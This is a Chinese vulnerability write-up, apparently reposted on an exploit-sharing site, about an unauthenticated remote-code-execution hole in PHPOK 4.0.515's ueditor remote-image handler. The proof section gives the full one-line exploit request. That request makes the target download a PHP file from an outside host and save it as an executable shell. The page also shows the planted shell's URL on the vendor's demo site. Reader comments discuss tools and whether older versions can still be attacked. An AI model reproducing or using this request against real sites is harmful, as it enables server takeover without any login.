漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

phpok通杀前台getshell 4.0.515官方demo测试成功

漏洞作者: 索马里的海贼

简要描述:

无任何限制,不用注册账号,不用csrf,不用注入。一个请求直接getshell。
不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明:

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明:

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php

我这里1.txt的内容是
<?php phpinfo();?>

测试问题嘛 不做破坏

0116020686c16e632111045598208f643379cf17

shell地址直接返回了。这里不返回也没事,文件名可以自己算出来。
http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php

01160315043f5872a131fa848c769c26ad486869

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » phpok通杀前台getshell 4.0.515官方demo测试成功

评论 11

  1. 不错的站,支持下留个名!!!

    冷笑话 2014-11-05    回复
  2. 那个是什么工具

    tjkk 2014-07-02    回复
    • 火狐上的hackbar插件

      0day5 2014-07-04    回复
  3. 那个返回地址怎么算呢~

    black angle 2014-06-26    回复
    • 仔细看文章,有py脚本给出的

      0day5 2014-06-26    回复
      • 构造请求

        那个是什么工具

        随风 2014-07-02    回复
        • 火狐上的hackbar插件

          0day5 2014-07-04    回复
  4. 老大,为什么我测试的都提示:error: file ueditor.php no exists!

    明天的风 2014-06-24    回复
    • 这个一般都是补上了,本人有测试成功的~

      0day5 2014-06-26    回复
      • 旧版本的可以测试成功吗?

        活在当下 2014-10-03    回复
        • 应该可以的,我没有测试

          0day5 2014-10-06    回复